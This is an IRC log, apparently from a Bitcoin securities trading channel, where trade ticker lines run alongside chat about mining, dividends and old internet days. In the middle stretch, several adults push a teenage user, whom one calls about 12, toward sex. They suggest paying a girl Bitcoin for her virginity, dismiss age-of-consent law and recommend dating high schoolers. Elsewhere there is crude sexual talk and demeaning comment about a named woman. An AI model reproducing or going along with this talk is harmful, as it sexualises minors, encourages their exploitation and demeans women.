May 22 20:07:02 [HAVELOCK] [ASICM] 20 @ 0.027 = 0.54 BTC [-] May 22 20:07:10 ah. I see. May 22 20:08:00 [HAVELOCK] [ASICM] 1 @ 0.0272 BTC [+] May 22 20:08:06 ThickAsThieves: I wanted to thank you for some of your advice concerning BTC-BOND the other day. May 22 20:08:33 you mean that it's a decent investment? May 22 20:08:40 nice and predictable May 22 20:08:43 yeah May 22 20:09:01 [HAVELOCK] [ASICM] 3 @ 0.0272 = 0.0816 BTC [+] May 22 20:09:02 you will use btc once govt says it is illegal? << I'd simply to another country May 22 20:09:14 soypirate pretty lulzy May 22 20:09:20 Are gribble's estimates for solo mining? May 22 20:09:47 WILLdude it's per hashpower. not much to do with solo or pooled May 22 20:10:14 Surely they pay out different rates? May 22 20:10:23 The expected generation output, at 334.0 Mhps, given May 22 20:10:23 difficulty of 11187257.4614, is 0.0150144731243 BTC per day May 22 20:10:31 Sorry May 22 20:10:36 mircea_popescu: I am still trying to sort through the lulz from the good advice.... May 22 20:10:40 Putty copying :( May 22 20:11:06 WILLdude how would they pay out different rates ?! May 22 20:11:16 soypirate yeah, sometimes it gets surreal. May 22 20:11:43 Because surely, finding a block is a matter of luck and you might never do it. May 22 20:11:46 IDK May 22 20:11:49 Oh I guess. May 22 20:11:53 and the winner is! https://bitcointalk.org/index.php?topic=199449.msg2236325#msg2236325 May 22 20:11:59 statistically thje results are the same tho WILLdude May 22 20:12:55 We need to introduce basic math skills around the world I am seeing May 22 20:13:15 [13:13] We need to introduce basic math skills around the world I am seeing <<< but then I'd make less money May 22 20:13:23 yes, that is true May 22 20:13:44 jborkl it's ironic that these people are using computers ;/ May 22 20:14:01 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [-] May 22 20:14:02 [HAVELOCK] [ASICM] 2 @ 0.027 = 0.054 BTC [-] May 22 20:14:11 it is, sometimes it is a wonder that they don't short out the keyboard drooling on it May 22 20:14:22 We make ASIC Bitcoin Mining Gear using the ASIC chips Sourced from Taiwan. May 22 20:14:22 3.1 -3.3 GHash/sec 4 Board (has 32 chips) - 15 BTC May 22 20:14:22 9.3-9.9 GHash/sec 12 Board (has 96 chips) - 30 BTC May 22 20:14:34 (spam) May 22 20:15:26 but free delivery, right? May 22 20:15:49 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 22 20:15:56 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [+] May 22 20:16:02 [HAVELOCK] [ASICM] 10 @ 0.027 = 0.27 BTC [-] May 22 20:16:12 either they are using different chips on the boards, or once again math fails the universe May 22 20:16:33 aknap3 ya, via POP3 May 22 20:16:37 do you guys think s.dice shares will go up when the next dividend gets paid? May 22 20:16:38 woohoo! May 22 20:16:43 [BTCTC] [CRYPTO-TRADE] 5 @ 0.19 = 0.95 BTC [-] May 22 20:16:49 soypirate iirc the dividend was setting up to be very small May 22 20:16:54 soypirate: if people were smart they would go up BEFORE the dividends are paid May 22 20:16:57 dooglus' stuff was showing a loss neh ? May 22 20:17:09 i mean...p/e ratio of .28 May 22 20:17:24 yes, about 1500 BTC yesterday May 22 20:17:35 jborkl: link? May 22 20:17:41 mirceau_popescu is that part of a trend because of rising btc price? May 22 20:17:54 I love MPOE-PR now May 22 20:17:56 so, will most likely have a carryover - and confuse math impaired people once again May 22 20:17:57 lol May 22 20:18:15 well...1500 is not hard to get in 10 days... May 22 20:18:15 [BTCTC] [ESECURITYSABTC] 3 @ 0.25 = 0.75 BTC [-] May 22 20:18:18 soypirate it's mircea you know. if you just type mir ands hit tab it fills it in for you. but anyway, maybe there's some relation to usd May 22 20:18:18 depending on volume May 22 20:18:38 I see May 22 20:18:39 https://bitcointalk.org/index.php?topic=80312.1380 May 22 20:18:47 https://bitcointalk.org/index.php?topic=199449.msg2236452#msg2236452 May 22 20:19:07 mjr_ actually it being a gamble... it can get 10k bet within the hour, and win it all. May 22 20:19:09 so then it's 10k up May 22 20:19:15 iirc this happened once maybe in january ? May 22 20:19:31 yeah, at the very end of the month May 22 20:19:37 yes, that is true May 22 20:19:37 [MPEX] [S.MPOE] 44827 @ 0.00068 = 30.4824 BTC [+] May 22 20:20:01 [HAVELOCK] [ASICM] 287 @ 0.027 = 7.749 BTC [-] May 22 20:20:05 [BTCTC] [S.DICE-PT] 20 @ 0.003169 = 0.0634 BTC [+] May 22 20:20:11 i was saying that over ten days they could have 50*1500 btc May 22 20:20:28 with EV they would then break even...but i am not seeing the loss on this chart yet May 22 20:20:28 either way, for all we know they could be 10k in the hole May 22 20:20:30 still reading May 22 20:20:39 well, it is luck based after all May 22 20:20:47 big havelock buy coming up May 22 20:21:00 [HAVELOCK] [ASICM] 3413 @ 0.027 = 92.151 BTC [-] May 22 20:21:03 bam May 22 20:21:36 how did you know that ?! May 22 20:21:42 it was a bid May 22 20:21:46 i filled it May 22 20:22:01 [HAVELOCK] [ASICM] 26 @ 0.027 = 0.702 BTC [-] May 22 20:22:32 sold May 22 20:23:00 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [-] May 22 20:23:01 i'm gonna steal all your arbs goat May 22 20:23:16 o i c May 22 20:23:30 http://www.youtube.com/watch?v=OPcod8IS214 May 22 20:23:38 Chaang-Noi: why? because of the downtime? May 22 20:23:55 lol May 22 20:24:01 [HAVELOCK] [ASICM] 5 @ 0.02685 = 0.1343 BTC [-] May 22 20:24:11 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 22 20:24:26 about a year ago i wrote an article, in romanian, titled " how to suck cock. guide for half of oral sex." May 22 20:24:39 to this day it's the most read piece on my blog. every single day since then it has been May 22 20:24:50 that's the internet for you May 22 20:25:02 lol May 22 20:25:08 ironically, i've never sucked cock myself May 22 20:25:12 so yes, that's the internet. May 22 20:25:22 i have mircea_popescu May 22 20:25:27 you should try it May 22 20:25:27 mp only sucks cock with friends May 22 20:25:42 jcpham haha you seen carlin in jay and silent bob ? May 22 20:25:54 God, TAT, people really try to put you through the ringer for that 5% May 22 20:26:01 yep May 22 20:26:12 even when i spend a long time writing up a post May 22 20:26:14 yes May 22 20:26:18 to bang them over the head with math May 22 20:26:20 i get May 22 20:26:25 everyone should try sucking dick at least once May 22 20:26:28 male and female May 22 20:26:32 NOU TAKE MY 5% NOWAI May 22 20:26:46 [BTCTC] [S.DICE-PT] 1 @ 0.00317 BTC [+] May 22 20:26:51 [BTCTC] [CRYPTO-TRADE] 5 @ 0.19 = 0.95 BTC [-] May 22 20:28:01 [HAVELOCK] [ASICM] 10 @ 0.027 = 0.27 BTC [+] May 22 20:29:02 [HAVELOCK] [ASICM] 74 @ 0.0272 = 2.0128 BTC [+] May 22 20:29:12 Such is the internet, I guess May 22 20:29:59 jcpham female dick ? May 22 20:30:17 ThickAsThieves along the same lines https://bitcointalk.org/index.php?topic=212544.msg2232539#msg2232539 May 22 20:31:00 [HAVELOCK] [ASICM] 3 @ 0.027 = 0.081 BTC [-] May 22 20:32:55 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [-] May 22 20:33:00 [HAVELOCK] [ASICM] 208 @ 0.0269 = 5.5952 BTC [-] May 22 20:33:35 https://bitcointalk.org/index.php?topic=201461.0 << Your average Bitcoin enthusiast. May 22 20:34:37 kakobrekla https://bitcointalk.org/index.php?topic=120757.msg1650360#msg1650360 can you believe he still didn't add it ? :D May 22 20:34:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.02621 BTC [-] May 22 20:35:01 [HAVELOCK] [ASICM] 19 @ 0.02691 = 0.5113 BTC [+] May 22 20:35:03 [HAVELOCK] [ASICM] 292 @ 0.0269 = 7.8548 BTC [-] May 22 20:35:17 tbh its getting harder and harder to suprise me May 22 20:35:27 old age. May 22 20:36:17 or just bitcoin May 22 20:37:00 [HAVELOCK] [ASICM] 2 @ 0.0272 = 0.0544 BTC [+] May 22 20:39:00 Ergh. May 22 20:39:20 Having a hard time deciding if to sell or not. May 22 20:40:01 [HAVELOCK] [ASICM] 10 @ 0.027 = 0.27 BTC [-] May 22 20:40:57 [BTCTC] [BASIC-MINING] 2 @ 0.54 = 1.08 BTC [+] May 22 20:41:49 [MPEX] [S.MPOE] 850 @ 0.00068 = 0.578 BTC [+] May 22 20:42:01 [HAVELOCK] [ASICM] 3 @ 0.027 = 0.081 BTC [-] May 22 20:44:00 [HAVELOCK] [ASICM] 5 @ 0.0272 = 0.136 BTC [+] May 22 20:44:36 [BTCTC] [ASICMINER-PT] 1 @ 2.414 BTC [-] May 22 20:46:01 [HAVELOCK] [ASICM] 2 @ 0.0271 = 0.0542 BTC [-] May 22 20:47:00 [HAVELOCK] [ASICM] 7 @ 0.0271 = 0.1897 BTC [-] May 22 20:47:45 [BTCTC] [TAT.ASICMINER] 11 @ 0.0262 = 0.2882 BTC [-] May 22 20:48:30 WILLdude: my advice is to sleep on it. May 22 20:48:55 WILLdude, consider this May 22 20:49:00 also, sleep with as many girls as you can before it becomes illegal. May 22 20:49:03 what will you do with the BTC if you sell? May 22 20:49:20 nothing? May 22 20:49:22 save it? May 22 20:49:24 sell it? May 22 20:49:32 or invest in something stupid? May 22 20:49:34 he's gonnna buy a fleshlight, what else would a self-respecting teenager do> May 22 20:49:37 ? May 22 20:49:40 lol May 22 20:50:17 the only thing that cut into my quake1 gaming at that age was constant masturbation. May 22 20:50:30 it's hard to frag and jerk off at the same time. May 22 20:50:38 also it's not very satisfying. May 22 20:50:51 [MPEX] [S.MPOE] 9550 @ 0.00067374 = 6.4342 BTC [-] May 22 20:51:00 unless you're playing RUNES and you cum when you get berserk rune. May 22 20:51:08 berserk ftw May 22 20:52:24 ThickAsThieves: Sell it. May 22 20:52:32 But I guess I don't need the money. May 22 20:52:47 so hold it. May 22 20:53:00 [HAVELOCK] [ASICM] 2 @ 0.0271 = 0.0542 BTC [-] May 22 20:53:56 WILLdude, again, go find a girl your age and fuck her silly. May 22 20:53:59 either hold the BTC May 22 20:54:01 [HAVELOCK] [ASICM] 36 @ 0.0271 = 0.9756 BTC [-] May 22 20:54:04 or hold the stocks May 22 20:54:05 give her your .5btc for her virginity May 22 20:54:10 dont get trigger happy May 22 20:54:14 or youll lose it al May 22 20:54:15 it's totally worth it for both of you. May 22 20:54:15 l May 22 20:54:25 Eww May 22 20:54:36 gays May 22 20:54:37 ok, new guy is asexual. May 22 20:55:52 Have you heard of age of consent? May 22 20:56:03 Or the concept of embarrasment? May 22 20:56:05 [BTCTC] [ASICMINER-PT] 1 @ 2.410001 BTC [-] May 22 20:56:09 yes, and that age is different or nonexistent across the globe. May 22 20:56:29 willdude, that is just a concept, but the memory of fucking her will last a lifetime. your concept is just an idea. May 22 20:56:49 well, not a lifetime, it will fade as you bed more women. May 22 20:57:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.0265 = 0.106 BTC [+] May 22 20:57:52 WILLdude, I had this catholic sexual guilt thing going on for most of my teenage years. I missed out on a TON of teenage sex because of it. WORST MISTAKE EVAR. May 22 20:58:04 because of 'embarassment'. May 22 20:58:15 cast off that prison May 22 20:58:16 haha May 22 20:58:25 do not be a prisoner of your thoughts. May 22 20:58:28 But no. May 22 20:58:29 prison, begone May 22 20:58:30 they are just thoughts May 22 20:58:44 but a wet pussy is a wet pussy, fo realz. May 22 20:58:55 not a thought about embarassment. which do you chooose? May 22 20:58:55 I'm too fat, I wouldn't be able to see anything interesting. May 22 20:59:01 [HAVELOCK] [ASICM] 1 @ 0.0271 BTC [-] May 22 20:59:02 :) May 22 20:59:12 you will never know until you try. May 22 20:59:18 and you will never lose until you give up trying. May 22 20:59:32 fat dudes get laid all the time May 22 20:59:39 its more a confidence thing May 22 20:59:42 just own it May 22 20:59:52 you'll find chix May 22 21:00:03 alternatively get the fuck off irc and ride a bike May 22 21:00:07 lol May 22 21:00:07 truffles, context was the thoughts are of being 'embarassed'. May 22 21:00:20 benkay_: +10 May 22 21:00:24 sex burns calories too May 22 21:00:31 well, maybe not teen sex May 22 21:00:35 lmao May 22 21:00:40 negligible amouts, tat. don't promulgate that shit. May 22 21:00:41 lawls May 22 21:01:06 benkay_ i dunno how negligible it is man. if it burns rubber it sure as hell burns calories too May 22 21:01:18 WILLdude: you can fix fat, but you can't fix "I never had sex with teenage girls, now it's too late". May 22 21:01:22 localized dissipation. gimme a break, guys. May 22 21:01:35 so wtf is with the am div May 22 21:01:38 deadweasel goat would disagree May 22 21:01:39 deadweasel it's never too late, just live in a sane country. May 22 21:01:46 Haha May 22 21:01:48 lol May 22 21:01:50 [02:00:25] sex burns calories too May 22 21:01:51 IDC about that. May 22 21:01:55 kakobrekla, and I repect him for it, but his local laws allow it, or the local culture. May 22 21:02:03 if that were true, I would be the skinniest man alive May 22 21:02:04 The thing is. May 22 21:02:11 mircea_popescu: I'm seriously considering it lately. May 22 21:02:11 it's a) illegal May 22 21:02:14 so its a geolocation thing deadweasel May 22 21:02:21 I'd have one chick impaled on my dick, and another chick feeding me hamburgers May 22 21:02:23 both at the same time May 22 21:02:24 b) embarrassing May 22 21:02:24 [14:01] so wtf is with the am div <<< Haven't you heard, I needed to buy some new toys May 22 21:02:39 Willdude, what STATE are you in? May 22 21:02:40 c) Very enjoyable May 22 21:02:43 UK May 22 21:02:46 bingo May 22 21:02:49 Hampshire. May 22 21:02:50 it's not illegal for teens to have sex with each other is it?! May 22 21:02:59 my Grandma is in South Hampton, go fuck her. May 22 21:03:05 she hasn't gotten laid in 40 years! May 22 21:03:13 not under the age of 18 or within 2 years age difference in canada. 17 <-> 19 works May 22 21:03:22 its 1 year in the US May 22 21:03:37 Diablo-D3 actually here's the thing to do : http://trilema.com/2012/orice-cuplu-functional/ May 22 21:03:37 and its only illegal if you get caught May 22 21:03:37 yes, bad here. May 22 21:04:04 [MPEX] [S.DICE] 2 @ 0.00202001 = 0.004 BTC [-] May 22 21:04:10 mircea_popescu: thats like the worst photo of a blowjob ever May 22 21:04:14 Some states like Arkansas , teens have to, according to the law. Keeps the mobile home industry growing May 22 21:04:35 lol May 22 21:04:39 paywall May 22 21:04:40 donotwant May 22 21:04:47 TAT, it is. May 22 21:04:49 fuck you, pay me! May 22 21:04:52 LOL May 22 21:05:00 do no twant? no, fiat500, do twat! May 22 21:05:08 confirmed: mp is a whore May 22 21:05:16 fuck me, pay me! May 22 21:05:20 Willdude: you can always focus on growing your pocketbook + monetizeable skills through high school while shrinking your gut. then in college, date high schoolers. younger girls are 10x. May 22 21:05:34 that is sound advice May 22 21:05:36 [MPEX] [S.MPOE] 24600 @ 0.00067357 = 16.5698 BTC [-] May 22 21:05:38 what's this obsession with fucking kids anyway. May 22 21:05:39 benkay_: meh, virgins suck May 22 21:05:46 because you'll figure out how to fuck and you'll be fit and you'll have some money. May 22 21:05:47 I've always liked women older than I am May 22 21:05:48 so trainable though, diablo! May 22 21:05:51 i muchly oprefer twenny somethings to teens May 22 21:05:54 at least they know what they're doing May 22 21:05:57 how old is WILLdude May 22 21:06:03 me too mircea_popescu May 22 21:06:03 sadly, I am now 29, older women are now my age. May 22 21:06:03 Scrat like 12 May 22 21:06:09 not really advice for this chan. more advice for WD. May 22 21:07:35 lol May 22 21:07:45 unicorns May 22 21:07:47 is this AOL chat room or sumth? May 22 21:07:59 asl? May 22 21:08:00 18/f/cali May 22 21:08:10 lol May 22 21:08:12 refernce AOL? 1990 called and they want AOL back May 22 21:08:21 reference May 22 21:08:28 [MPEX] [S.DICE] 3648 @ 0.00202001 = 7.369 BTC [-] May 22 21:08:30 [MPEX] [S.DICE] 15352 @ 0.00202 = 31.011 BTC [-] May 22 21:08:46 i hate to say it aol was my first isp when them dammm 50 hr free floppys :) May 22 21:08:59 i hate like 50 floods confirmed May 22 21:09:00 [HAVELOCK] [ASICM] 55 @ 0.0271 = 1.4905 BTC [-] May 22 21:09:04 back when you could do it May 22 21:09:06 i used AOL dial up on my packard bell May 22 21:09:24 I remember installing my 14.4b modem and being so excited May 22 21:09:30 i hade to disable pm's on my 486 because of people flooding May 22 21:09:46 like NICK$OFF or something May 22 21:10:03 oh the goodold days..... May 22 21:10:08 me too zerokwel May 22 21:10:25 14.4kbps, fucking lightening speed. May 22 21:10:28 aol? good old days? May 22 21:10:31 http://dottech.org/96601/aol-still-sells-over-600-million-worth-of-slow-dial-up-internet-per-year/ May 22 21:10:42 jborkl I am now crying May 22 21:10:43 usenet, my brothers, usenet. May 22 21:10:52 that was once a thing, right? May 22 21:10:57 back in them days it was ftp :) May 22 21:11:00 [HAVELOCK] [ASICM] 2 @ 0.02682 = 0.0536 BTC [-] May 22 21:11:02 omg internet nostalgia trip May 22 21:11:06 dialup was awesome because you could find carriers May 22 21:11:06 all about the private sites :) May 22 21:11:19 i literally found my school's carrier in another town May 22 21:11:25 and borrowed their access May 22 21:11:41 mircea_popescu on the subject of nineties and bootstrap and geocities, try this for the MPEx web site May 22 21:11:41 http://divshot.github.io/geo-bootstrap/ May 22 21:11:42 dial isp were awesome May 22 21:11:55 http://www.youtube.com/watch?v=gsNaR6FRuO0 May 22 21:11:56 :) May 22 21:12:00 [HAVELOCK] [ASICM] 8 @ 0.02681 = 0.2145 BTC [-] May 22 21:12:07 win benkay_ May 22 21:12:14 it would be an improvement May 22 21:12:16 omg this is hate crime May 22 21:12:32 aww that's slick mircea_popescu May 22 21:12:37 you should implement that May 22 21:12:40 I remember trading pearl jam live bootlegs on BBS May 22 21:12:50 and programming in BASIC May 22 21:13:00 [HAVELOCK] [ASICM] 23 @ 0.0271 = 0.6233 BTC [+] May 22 21:13:07 before that my texas instruments unit May 22 21:13:11 with Hunt the Wumpus May 22 21:13:18 i realllllly like that geo-bootstrap May 22 21:13:19 ppl see mpex site trippin they geocitin' May 22 21:13:21 lol I remember that May 22 21:13:32 Hunt the Wumpus, lol May 22 21:13:37 so good May 22 21:13:41 changing my cell phone ring tune to that dialup sound :) May 22 21:14:20 [BTCTC] [RSM] 1 @ 0.011993 BTC [-] May 22 21:14:21 ok apparently sec just charged a city in florida with securities fraud May 22 21:14:29 nice May 22 21:14:33 which? May 22 21:14:39 http://www.sec.gov/news/press/2013/2013-91.htm May 22 21:15:05 heh May 22 21:15:07 it's nice to see muni's screwing wall street for a change May 22 21:15:14 probly just idiocy, not intentional fraud May 22 21:15:31 but you'll never hear bankers behavior called "fraudulent conduct" May 22 21:15:54 when bankers do it on purpose, it's business. when munis do it via incompetence, it's fraud. May 22 21:15:58 welcome to america. May 22 21:17:01 [BTCTC] [ASICMINER-PT] 1 @ 2.685 BTC [+] May 22 21:17:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.0265 = 0.053 BTC [+] May 22 21:17:15 standards gonna stand May 22 21:17:40 well ya. May 22 21:17:55 ya well May 22 21:18:02 this is the purpose of "regulation", and this is why it ain't happening here. May 22 21:18:30 meanwhile https://twitter.com/Mircea_Popescu/status/337270544342847488 May 22 21:18:59 i'm a huge fan of fake it til you make it May 22 21:19:30 seems apropos, no May 22 21:20:00 [HAVELOCK] [ASICM] 66 @ 0.027 = 1.782 BTC [-] May 22 21:20:02 [HAVELOCK] [ASICM] 2 @ 0.027 = 0.054 BTC [-] May 22 21:23:00 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [-] May 22 21:23:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0265 BTC [+] May 22 21:24:32 https://twitter.com/BFL_News May 22 21:25:01 [HAVELOCK] [VTX] 6 @ 0.4212 = 2.5272 BTC [+] May 22 21:25:46 lol BFL May 22 21:25:47 tis bullshit. May 22 21:26:01 [HAVELOCK] [ASICM] 10 @ 0.027 = 0.27 BTC [-] May 22 21:26:11 they just need 2 more weeks of sales, to cover all the cancellations May 22 21:26:33 i think it will be known as bfl syndrome May 22 21:27:08 i met this hilarious kid at buttcon who's doing mining arbing on altchains considering nethash and price May 22 21:27:22 from jersey May 22 21:27:25 running on free juice May 22 21:27:41 benkay_ most of the kids these days do that afaik May 22 21:27:44 can't help but assume he's operating out of some mob bakery May 22 21:27:59 pfft, basement May 22 21:28:00 [HAVELOCK] [VTX] 9 @ 0.41122 = 3.701 BTC [-] May 22 21:28:01 yeah they arbed it to 1:1 btc May 22 21:28:27 http://www.coinwarz.com/cryptocurrency May 22 21:28:28 lol May 22 21:28:32 Worldcoin? May 22 21:28:39 it never ends May 22 21:28:56 which brings us back to having sex with minors (!=miners). May 22 21:29:22 maybe in the future every house appliance will have not only its own ip May 22 21:29:26 but also its own alt chain May 22 21:29:36 i said before, May 22 21:29:39 fridge trades fridgecoin with microwave for microcoin... May 22 21:29:48 I think govs should make their wn altchains asap May 22 21:29:50 power credits? May 22 21:29:53 http://www.academicearth.org/electives/internet-knows-bitcoin/ May 22 21:29:59 own* May 22 21:30:01 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [-] May 22 21:30:11 totes, TAT. May 22 21:30:24 if there was a eurocoin, then they might just survive this bitcoin madness May 22 21:30:30 ThickAsThieves if i was the gaddafi of some place i would have by now. May 22 21:30:34 but then they couldn't print their way out of their problems. May 22 21:30:36 but if they all try to fight bitcoin, theyll lose May 22 21:31:01 [HAVELOCK] [VTX] 1 @ 0.41122 BTC [-] May 22 21:31:01 TAT, you did asicminer divs yet? May 22 21:31:09 "you wanna buy our oil/diamonds/nubile young slaves/wtvr ? pay in MPCOIN!!!" May 22 21:31:17 [BTCTC] [S.DICE-PT] 112 @ 0.003375 = 0.378 BTC [+] May 22 21:31:21 seriously, why isn't there an mpcoin yet? May 22 21:31:57 louong, TAT.AM holders got divs before anyone, including direct shareholders May 22 21:32:01 that's how I roll May 22 21:32:10 TAT, I meant for this weeks' divs May 22 21:32:13 did you send them out yet? May 22 21:32:14 me too May 22 21:33:14 to be clear, yes, divs were paid out an hour or two ago May 22 21:33:33 awesome thx May 22 21:35:30 [BTCTC] [ASICMINER-PT] 1 @ 2.6489 BTC [-] May 22 21:36:01 [HAVELOCK] [ASICM] 1 @ 0.0271 BTC [+] May 22 21:37:32 ThickAsThieves: so you paid out divs before you got paid? smart if so, but wonder how you knew the % coming to you May 22 21:37:47 [BTCTC] [S.DICE-PT] 3 @ 0.003375 = 0.0101 BTC [+] May 22 21:38:25 [BTCTC] [GSDPT] 2 @ 0.00284 = 0.0057 BTC [+] May 22 21:38:34 https://bitcointalk.org/index.php?topic=212490.0 May 22 21:38:36 huge May 22 21:38:56 anyone have a bitmessage address to share with me May 22 21:40:00 [HAVELOCK] [ASICM] 10 @ 0.027 = 0.27 BTC [-] May 22 21:40:01 [HAVELOCK] [ASICM] 20 @ 0.0269 = 0.538 BTC [-] May 22 21:40:02 [HAVELOCK] [ASICM] 112 @ 0.02681 = 3.0027 BTC [-] May 22 21:40:04 [HAVELOCK] [ASICM] 215 @ 0.02656 = 5.7104 BTC [-] May 22 21:40:05 [HAVELOCK] [ASICM] 293 @ 0.0265 = 7.7645 BTC [-] May 22 21:40:06 ThickAsThieves: so you paid out divs before you got paid? smart if so, but wonder how you knew the % coming to you <<< yes, I just waited to learn the payout amount May 22 21:40:13 and used my own BTC to pay May 22 21:40:33 some risk i guess May 22 21:40:35 but not much May 22 21:40:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02591 BTC [-] May 22 21:41:13 just trying to raise the bar May 22 21:41:20 ThickAsThieves: ya, and earn some favor IMO :) considering the huge delay on burnside's May 22 21:41:37 gives people a chance for double divs too May 22 21:41:40 if pricing works out May 22 21:42:01 [HAVELOCK] [SDICE] 3 @ 0.2202 = 0.6606 BTC [-] May 22 21:42:02 which encourages people to stay wrapped up in AM May 22 21:42:02 true that May 22 21:42:25 where they should be! May 22 21:42:42 of course the larger my PT gets, the harder it will be for me to do this May 22 21:42:57 and of there is an unexpectedly large div, could be hard too May 22 21:43:20 ya but seems like ur fine for a bit May 22 21:47:55 ;;title http://www.reuters.com/article/2013/05/22/us-markets-global-idUSBRE88901C20130522 May 22 21:47:55 Error: This url is not on the whitelist. May 22 21:48:03 "Bernanke spurs stock volatility, dollar gains" May 22 21:48:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0259 BTC [-] May 22 21:48:38 [BTCTC] [S.DICE-PT] 2335 @ 0.00338 = 7.8923 BTC [+] May 22 21:48:44 cool shit jcpham. May 22 21:50:12 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [-] May 22 21:50:20 Bernanke with his fingers on the nipples of the economy May 22 21:51:14 will he pinch, poke, or twist? tune in next quarter! May 22 21:51:32 mircea_popescu: reportedly female user wants to start ASIC company in UK, has personal website: https://bitcointalk.org/index.php?topic=213241.msg2237298#msg2237298 May 22 21:51:46 she could be MPOE-PR #2? May 22 21:51:51 she has datacenter May 22 21:51:54 nom May 22 21:51:56 btctc.. reddit.. cant catch a freaking break. http://dl.dropboxusercontent.com/u/58484258/Screenshots/em9u.png May 22 21:52:25 oic. kate. May 22 21:52:34 [MPEX] [S.MPOE] 8380 @ 0.00067374 = 5.6459 BTC [+] May 22 21:56:23 kate, you know her? May 22 21:58:26 she's a poor sailor, http://kate.craig-wood.com/image.php?file=images/pics/water/sail8_sc.jpg May 22 21:58:44 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 22 21:59:04 although, unless completely fake, may have some brains/skills May 22 21:59:53 argh May 22 22:00:12 successful cloud entrepreneur May 22 22:01:13 family section, read about Nikc, the brother, apparently he is the brainz of the op. May 22 22:01:40 could entreprenuer doesn't meanshit unless you get a company to pay for putting them on 'the cloud' May 22 22:01:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.025802 BTC [-] May 22 22:01:57 but still, i'm biased towards vaginas. May 22 22:02:35 everyone with a penis is May 22 22:02:56 not the gays May 22 22:03:02 [MPEX] [S.MPOE] 2233 @ 0.00068019 = 1.5189 BTC [+] May 22 22:03:11 they are a statistical anomaly May 22 22:03:11 unless they want to talk, then biased towards vaginas May 22 22:03:16 it's true May 22 22:03:25 [BTCTC] [S.MPOE-PT] 1 @ 0.000646 BTC [-] May 22 22:03:27 wow she tipped a cat May 22 22:03:43 that takes some doing May 22 22:03:53 and some ovaries to push it into that part of the performance envelope May 22 22:07:27 [BTCTC] [BASIC-MINING] 4 @ 0.54 = 2.16 BTC [+] May 22 22:10:00 [HAVELOCK] [ASICM] 47 @ 0.0265 = 1.2455 BTC [-] May 22 22:10:27 [BTCTC] [TAT.ASICMINER] 49 @ 0.025802 = 1.2643 BTC [-] May 22 22:10:50 her plan is not quite as bad as average noob May 22 22:13:20 [BTCTC] [PAJKA.BOND] 4 @ 0.108987 = 0.4359 BTC [-] May 22 22:14:18 who is the kate lady May 22 22:14:23 the blog made lulz May 22 22:14:41 nobody has responded to her 20 post acount yet. May 22 22:14:50 MPOE-PR should welcome her... ;) May 22 22:15:11 We'll need proof that user is who it claims to be. Might me a ploy by a mafious ring to make techies go in Surrey and kidnap them to slave away at producing ASICs! May 22 22:15:47 (I'm a successful cloud IaaS entrepreneur - see memset.com) and am fairly technical but building a GPU mining rig is about my limit. May 22 22:15:56 megabarf May 22 22:16:16 i stopped reading after that May 22 22:17:41 [BTCTC] [PAJKA.BOND] 4 @ 0.108987 = 0.4359 BTC [-] May 22 22:17:52 i stopped fapping after that May 22 22:17:56 kept reading May 22 22:20:00 [HAVELOCK] [ASICM] 1 @ 0.02699998 BTC [+] May 22 22:22:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.025802 BTC [-] May 22 22:23:00 haters May 22 22:23:03 all of ye May 22 22:23:07 [BTCTC] [ASICMINER-PT] 1 @ 2.6287 BTC [+] May 22 22:25:05 She can't sail, but she's willing to try, that's a plus. May 22 22:25:39 What thread is this? May 22 22:25:49 [BTCTC] [RSM] 22 @ 0.012499 = 0.275 BTC [+] May 22 22:26:01 [HAVELOCK] [ASICM] 3 @ 0.0269 = 0.0807 BTC [-] May 22 22:26:43 [BTCTC] [BITVPS] 244 @ 0.00075 = 0.183 BTC [-] May 22 22:27:50 [BTCTC] [ASICMINER-PT] 6 @ 2.62871 = 15.7723 BTC [+] May 22 22:28:57 jborkl https://bitcointalk.org/index.php?topic=213241 May 22 22:30:00 [HAVELOCK] [ASICM] 16 @ 0.0269 = 0.4304 BTC [-] May 22 22:30:01 [HAVELOCK] [ASICM] 140 @ 0.02699998 = 3.78 BTC [+] May 22 22:30:02 [HAVELOCK] [ASICM] 29 @ 0.027 = 0.783 BTC [+] May 22 22:30:02 [HAVELOCK] [ASICM] 16 @ 0.027 = 0.432 BTC [+] May 22 22:31:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.026 = 0.052 BTC [+] May 22 22:32:33 [MPEX] [S.MPOE] 21684 @ 0.00068019 = 14.7492 BTC [+] May 22 22:33:15 [BTCTC] [BASIC-MINING] 4 @ 0.54 = 2.16 BTC [+] May 22 22:36:08 [BTCTC] [ASICMINER-PT] 1 @ 2.628 BTC [-] May 22 22:37:00 [HAVELOCK] [ASICM] 1 @ 0.02659998 BTC [-] May 22 22:37:02 [HAVELOCK] [ASICM] 1 @ 0.02659998 BTC [-] May 22 22:37:03 [HAVELOCK] [ASICM] 276 @ 0.027 = 7.452 BTC [+] May 22 22:44:01 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [+] May 22 22:46:01 [BTCTC] [ASICMINER-PT] 1 @ 2.461 BTC [-] May 22 22:46:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.026239 BTC [+] May 22 22:48:01 [HAVELOCK] [ASICM] 5 @ 0.027 = 0.135 BTC [+] May 22 22:50:01 [HAVELOCK] [ASICM] 3 @ 0.027 = 0.081 BTC [+] May 22 22:51:01 [HAVELOCK] [SDICE] 1 @ 0.221 BTC [+] May 22 22:51:02 [HAVELOCK] [SDICE] 2 @ 0.22 = 0.44 BTC [-] May 22 22:53:00 [HAVELOCK] [ASICM] 25 @ 0.027 = 0.675 BTC [+] May 22 22:55:05 ;;nethash May 22 22:55:07 85358.48701 May 22 